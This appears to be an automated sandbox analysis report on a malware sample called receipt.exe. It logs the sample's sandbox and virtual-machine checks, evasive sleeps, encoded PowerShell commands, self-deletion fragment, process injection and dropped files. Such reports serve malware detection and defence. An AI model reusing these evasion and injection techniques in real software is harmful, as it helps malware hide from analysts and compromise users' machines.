Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\receipt.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL&START-SLEEP -S 10; REMOVE-ITEM -PATH "
Source: receipt.exe, 00000000.00000002.346028348.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.345187251.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.548032095.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.489168945.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.486429428.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.514450713.0000000002B9F000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.526287923.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.518107476.0000000002C55000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000017.00000002.595827301.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000017.00000002.605315953.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000018.00000002.605861442.0000000003464000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\receipt.exe TID: 1076 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5196 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe TID: 5832 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe TID: 5904 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe TID: 6008 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 812 Thread sleep time: -11068046444225724s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3108 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5656 Thread sleep count: 8862 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 404 Thread sleep time: -18446744073709540s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\receipt.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9354 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9136 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9170
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8862
Source: C:\Users\user\Desktop\receipt.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: Uewizrlgm.exe, 0000000E.00000002.518107476.0000000002C55000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen'
Source: Uewizrlgm.exe, 00000018.00000002.605861442.0000000003464000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: Uewizrlgm.exe, 00000018.00000002.605861442.0000000003464000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: receipt.exe, 0000000C.00000002.529983371.00000000011F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: receipt.exe, 00000000.00000002.344350141.00000000013B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: receipt.exe, 0000001A.00000002.590003783.00000000014DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Enables debug privileges
Source: C:\Users\user\Desktop\receipt.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\receipt.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\receipt.exe Process created: Base64 decoded Start-Sleep -Seconds 20
Source: C:\Users\user\Desktop\receipt.exe Process created: Base64 decoded Start-Sleep -Seconds 50
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: Base64 decoded Start-Sleep -Seconds 20
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: Base64 decoded Start-Sleep -Seconds 20
Source: C:\Users\user\Desktop\receipt.exe Process created: Base64 decoded Start-Sleep -Seconds 20 Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process created: Base64 decoded Start-Sleep -Seconds 50 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: Base64 decoded Start-Sleep -Seconds 20 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: Base64 decoded Start-Sleep -Seconds 20 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\receipt.exe Memory written: C:\Users\user\Desktop\receipt.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Memory written: C:\Users\user\Desktop\receipt.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Memory written: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Memory written: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA== Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe "C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe" Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Process created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Process created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe Jump to behavior
Source: receipt.exe, 0000001A.00000002.605660341.0000000003277000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerh
Source: receipt.exe, 0000001A.00000002.605660341.0000000003277000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: receipt.exe, 0000001A.00000002.605660341.0000000003277000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerx
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\receipt.exe Queries volume information: C:\Users\user\Desktop\receipt.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\receipt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
